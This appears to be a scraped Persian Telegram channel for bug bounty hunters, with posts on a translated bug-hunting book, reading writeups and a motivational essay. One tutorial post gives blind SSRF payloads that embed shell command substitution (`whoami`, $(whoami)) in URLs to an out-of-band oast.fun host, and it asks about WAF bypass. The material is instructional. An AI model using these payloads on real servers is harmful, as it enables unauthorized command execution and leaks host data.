درود امیدوارم حالتون خوب باشه
همونطور که میدونید یکی از کتاب هایی که توی رودمپ یاد گیری وب هکینگ هست مخصوصا توصیه شده برای هانترها کتاب Real-World Bug Hunting _ Peter Yaworski هست. بعد از مدتی این کتاب رو بلاخره آماده کردم میخواستم چاپش کنم ولی خب بنا به دلایلی نشد که علتش رو هم توی کتاب توضیح دادم.
امیدوارم این کتاب مفید باشه براتون.
همونطور که میدونید یکی از کتاب هایی که توی رودمپ یاد گیری وب هکینگ هست مخصوصا توصیه شده برای هانترها کتاب Real-World Bug Hunting _ Peter Yaworski هست. بعد از مدتی این کتاب رو بلاخره آماده کردم میخواستم چاپش کنم ولی خب بنا به دلایلی نشد که علتش رو هم توی کتاب توضیح دادم.
امیدوارم این کتاب مفید باشه براتون.
🔥12
چرا باید رایتاپ بخونیم؟
خوندن ۵۰ تا رایتاپ مثل اینه که ۵۰ هکر حرفهای رو دعوت کنی کنار دستت بشینن و هر کدوم ذهنشون رو جلوت باز کنن. با هر رایتاپ، یه تیکه از درک و تجربهشون رو برمیداری و به روش خودت اضافه میکنی. نتیجه؟ چشمای تربیتشدهای که جزئیاتی رو میبینه که قبلاً هرگز به چشم نمیاومد و این دقیقاً همون چیزیه که یه باگهانتر حرفهای رو از بقیه جدا میکنه.
خوندن ۵۰ تا رایتاپ مثل اینه که ۵۰ هکر حرفهای رو دعوت کنی کنار دستت بشینن و هر کدوم ذهنشون رو جلوت باز کنن. با هر رایتاپ، یه تیکه از درک و تجربهشون رو برمیداری و به روش خودت اضافه میکنی. نتیجه؟ چشمای تربیتشدهای که جزئیاتی رو میبینه که قبلاً هرگز به چشم نمیاومد و این دقیقاً همون چیزیه که یه باگهانتر حرفهای رو از بقیه جدا میکنه.
👍39❤4
توی تست های blind ssrf شما جواب رو به صورت مستقیم نمیتونید ببینید باید از یه سرویس out of band کمک بگیرید تا بفهمید آیا سرور درخواست شما رو اجرا کرده یا نه.
برای دریافت پاسخ های out of band میتونید از
استفاده کنید.
این سه تا دستور رو توی تست های blind ssrf بیارید. میتونید باهاش دستورات سیستم عاملی اجرا کنید.
Text Payloads:
در نهایت باید پیلودتون شبیه به این باشه
Text Payloads:
کافیه این آدرس رو توی هر ورودی که مشکوک به ssrf هست بزنید و منتظر باشید در صورت آسیب پذیر بودن پاسخ توی داشبورد interactsh نمایش داده بشه
حالا یه سوال اگر waf به کلمه whoami یا کاراکتر هایی که داره باهاش ارسال میشه حساس باشه و درخواست رو بلاک کنه راهی برای دور زدنش هست؟
برای دریافت پاسخ های out of band میتونید از
https://app.interactsh.com
استفاده کنید.
این سه تا دستور رو توی تست های blind ssrf بیارید. میتونید باهاش دستورات سیستم عاملی اجرا کنید.
Text Payloads:
`whoami`
$(whoami)
${USER}
در نهایت باید پیلودتون شبیه به این باشه
Text Payloads:
https://`whoami`.wovpawxjsgngqywkn[.]oast[.]fun
https://$(whoami).wovpawxjsgngqywkn.oast.fun
https://${USER}.wovpawxjsgngqywkn.oast.fun
کافیه این آدرس رو توی هر ورودی که مشکوک به ssrf هست بزنید و منتظر باشید در صورت آسیب پذیر بودن پاسخ توی داشبورد interactsh نمایش داده بشه
حالا یه سوال اگر waf به کلمه whoami یا کاراکتر هایی که داره باهاش ارسال میشه حساس باشه و درخواست رو بلاک کنه راهی برای دور زدنش هست؟
👍9
ذهنیت مورچهای و زنبور عسلی: راهنمای عملگرا شدن
فرانسیس بیکن، فیلسوف معروف، دو نوع ذهنیت رو مقابل هم قرار میده:
1. ذهنیت مورچهای (گردآورندهی منفعل)
مثل مورچهای که دانه جمع میکنه و انبارش رو پر میکنه، اما هیچوقت از ذخیرهاش استفاده نمیکنه. این ذهن فقط اطلاعات رو جمعآوری میکنه، بدون اینکه بهشون معنا بده یا به کارشون ببره.
2. ذهنیت زنبور عسلی (خلاق و تحولآفرین)
مثل زنبور عسلی که شهد گلها رو جمع میکنه، پردازش میکنه و به عسل شیرین تبدیلشون میکنه. این ذهن دانش رو نهتنها جذب میکنه، بلکه با تحلیل، اجرا و آموزش به دیگران، اون رو به حکمت و دستاورد تبدیل میکنه.
عملگرا بودن یعنی چی؟
عملگرا بودن یعنی اینکه فقط به جمعآوری دانش بسنده نکنی، بلکه قدمی برداری و آموختههات رو توی دنیای واقعی پیاده کنی. یه ذهن زنبور عسلی، دانش رو میگیره، تحلیل میکنه، ایدههاش رو تست میکنه و حتی از شکستهاش درس میگیره. مثلاً، یه کارآفرین عملگرا کتابهای مدیریت رو میخونه، اما بهجای گیر کردن توی جزئیات، یه ایدهی ساده رو اجرا میکنه، بازخورد میگیره و بهترش میکنه. یا یه معلم عملگرا، بهجای فقط درس دادن، دانشآموزاش رو تشویق میکنه آموختههاشون رو توی پروژههای واقعی به کار ببرن.
چرا بعضیها فقط جمعآوری میکنن و عملگرا نیستن؟
بعضیها توی تلهی ذهنیت مورچهای میافتن چون:
ترس از شکست: فکر میکنن باید "کامل" باشن تا شروع کنن. مثلاً، میخوان یه کسبوکار راه بندازن، اما تا همهچیز "آماده" نباشه، دست به کار نمیشن.
اطلاعات بیش از حد: غرق اطلاعات میشن و نمیتونن تصمیم بگیرن از کجا شروع کنن. مثلاً، دهها کتاب و دوره آموزشی میخونن و میبینن، اما فلج تحلیلی میشن.
کمبود اعتمادبهنفس: فکر میکنن دانششون کافی نیست یا خودشون بهاندازهی کافی خوب نیستن.
عادت به انفعال: جمعآوری اطلاعات براشون یه جور احساس امنیت میده، چون حس میکنن دارن "پیشرفت" میکنن، بدون اینکه ریسک کنن.
مثال واقعی:
فکر کن دو نفر میخوان برنامهنویسی یاد بگیرن. نفر اول کلی آموزش آنلاین میبینه، کتاب میخونه و یادداشتبرداری میکنه، اما هیچوقت کدی نمینویسه چون "هنوز آماده نیست". نفر دوم هم آموزش میبینه، اما همزمان یه پروژهی ساده مثل یه ماشینحساب درست میکنه، باگهاش رو برطرف میکنه و کمکم پروژههای بزرگتر میسازه. اولی یه انبار دانشه، دومی یه برنامهنویس واقعیه.
یه راهحل ساده برای شروع عملگرا بودن
برای اینکه از ذهنیت مورچهای به زنبور عسلی برسی، از قانون 1-1-1 استفاده کن:
یه چیز کوچک یاد بگیر: بهجای غرق شدن توی اطلاعات، یه موضوع یا مهارت ساده انتخاب کن (مثلاً یه تابع ساده در برنامهنویسی یا یه تکنیک بازاریابی).
یه قدم کوچک بردار: یه پروژهی کوچیک با همون دانش شروع کن. مثلاً اگه داری بازاریابی یاد میگیری، یه پست ساده برای شبکههای اجتماعی بنویس و منتشر کن.
یه نتیجه کوچک بگیر: بازخورد کار رو بررسی کن. اگه جواب داد، ادامه بده. اگه نه، یه درس جدید یاد بگیر و دوباره امتحان کن.
مثال عملی: اگه میخوای نویسنده بشی، بهجای خوندن دهها کتاب درباره نویسندگی، امروز یه پاراگراف بنویس، فردا یه پست وبلاگ کوتاه منتشر کن و بازخوردش رو از دوستات بگیر. این چرخهی کوچک تو رو از انبار کردن دانش به خلق کردن و تأثیر گذاشتن میرسونه.
فرانسیس بیکن، فیلسوف معروف، دو نوع ذهنیت رو مقابل هم قرار میده:
1. ذهنیت مورچهای (گردآورندهی منفعل)
مثل مورچهای که دانه جمع میکنه و انبارش رو پر میکنه، اما هیچوقت از ذخیرهاش استفاده نمیکنه. این ذهن فقط اطلاعات رو جمعآوری میکنه، بدون اینکه بهشون معنا بده یا به کارشون ببره.
2. ذهنیت زنبور عسلی (خلاق و تحولآفرین)
مثل زنبور عسلی که شهد گلها رو جمع میکنه، پردازش میکنه و به عسل شیرین تبدیلشون میکنه. این ذهن دانش رو نهتنها جذب میکنه، بلکه با تحلیل، اجرا و آموزش به دیگران، اون رو به حکمت و دستاورد تبدیل میکنه.
عملگرا بودن یعنی چی؟
عملگرا بودن یعنی اینکه فقط به جمعآوری دانش بسنده نکنی، بلکه قدمی برداری و آموختههات رو توی دنیای واقعی پیاده کنی. یه ذهن زنبور عسلی، دانش رو میگیره، تحلیل میکنه، ایدههاش رو تست میکنه و حتی از شکستهاش درس میگیره. مثلاً، یه کارآفرین عملگرا کتابهای مدیریت رو میخونه، اما بهجای گیر کردن توی جزئیات، یه ایدهی ساده رو اجرا میکنه، بازخورد میگیره و بهترش میکنه. یا یه معلم عملگرا، بهجای فقط درس دادن، دانشآموزاش رو تشویق میکنه آموختههاشون رو توی پروژههای واقعی به کار ببرن.
چرا بعضیها فقط جمعآوری میکنن و عملگرا نیستن؟
بعضیها توی تلهی ذهنیت مورچهای میافتن چون:
ترس از شکست: فکر میکنن باید "کامل" باشن تا شروع کنن. مثلاً، میخوان یه کسبوکار راه بندازن، اما تا همهچیز "آماده" نباشه، دست به کار نمیشن.
اطلاعات بیش از حد: غرق اطلاعات میشن و نمیتونن تصمیم بگیرن از کجا شروع کنن. مثلاً، دهها کتاب و دوره آموزشی میخونن و میبینن، اما فلج تحلیلی میشن.
کمبود اعتمادبهنفس: فکر میکنن دانششون کافی نیست یا خودشون بهاندازهی کافی خوب نیستن.
عادت به انفعال: جمعآوری اطلاعات براشون یه جور احساس امنیت میده، چون حس میکنن دارن "پیشرفت" میکنن، بدون اینکه ریسک کنن.
مثال واقعی:
فکر کن دو نفر میخوان برنامهنویسی یاد بگیرن. نفر اول کلی آموزش آنلاین میبینه، کتاب میخونه و یادداشتبرداری میکنه، اما هیچوقت کدی نمینویسه چون "هنوز آماده نیست". نفر دوم هم آموزش میبینه، اما همزمان یه پروژهی ساده مثل یه ماشینحساب درست میکنه، باگهاش رو برطرف میکنه و کمکم پروژههای بزرگتر میسازه. اولی یه انبار دانشه، دومی یه برنامهنویس واقعیه.
یه راهحل ساده برای شروع عملگرا بودن
برای اینکه از ذهنیت مورچهای به زنبور عسلی برسی، از قانون 1-1-1 استفاده کن:
یه چیز کوچک یاد بگیر: بهجای غرق شدن توی اطلاعات، یه موضوع یا مهارت ساده انتخاب کن (مثلاً یه تابع ساده در برنامهنویسی یا یه تکنیک بازاریابی).
یه قدم کوچک بردار: یه پروژهی کوچیک با همون دانش شروع کن. مثلاً اگه داری بازاریابی یاد میگیری، یه پست ساده برای شبکههای اجتماعی بنویس و منتشر کن.
یه نتیجه کوچک بگیر: بازخورد کار رو بررسی کن. اگه جواب داد، ادامه بده. اگه نه، یه درس جدید یاد بگیر و دوباره امتحان کن.
مثال عملی: اگه میخوای نویسنده بشی، بهجای خوندن دهها کتاب درباره نویسندگی، امروز یه پاراگراف بنویس، فردا یه پست وبلاگ کوتاه منتشر کن و بازخوردش رو از دوستات بگیر. این چرخهی کوچک تو رو از انبار کردن دانش به خلق کردن و تأثیر گذاشتن میرسونه.
❤25👍2🔥2